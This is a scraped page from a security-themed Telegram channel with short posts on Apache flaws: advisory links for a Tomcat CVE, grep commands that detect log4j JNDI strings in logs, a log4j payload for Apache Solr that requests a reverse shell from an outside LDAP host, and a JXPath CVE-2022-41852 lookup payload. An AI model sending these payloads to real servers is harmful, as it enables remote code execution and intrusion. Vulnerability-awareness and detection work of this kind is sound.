Security Analysis
@securation
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
About
Blog
Apps
Platform
Join
Security Analysis
11.5K subscribers
Security Analysis
#apache #tomcat #apache_tomcat
https://www.jpcert.or.jp/english/at/2021/at210002.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24122

https://nvd.nist.gov/vuln/detail/CVE-2021-24122

@securation
JPCERT/CC
Alert Regarding Vulnerability (CVE-2021-24122) in Apache Tomcat
1.71K viewsedited  
Security Analysis
https://twitter.com/1rpwn/status/1469240466071859213
Twitter
Adel
sudo grep -r '${jndi:ldap://' /var/log sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log #log4j #log_4jrce #RCE #apache
1.61K views
Security Analysis
apache solr EXP #log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json

#log4j #apache #exploit
@securation
1.98K views
Security Analysis
⭕️Apache Commons Jxpath (CVE-2022-41852)

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #jxpath #exploit
@securation
👍4
3.8K viewsAdel, edited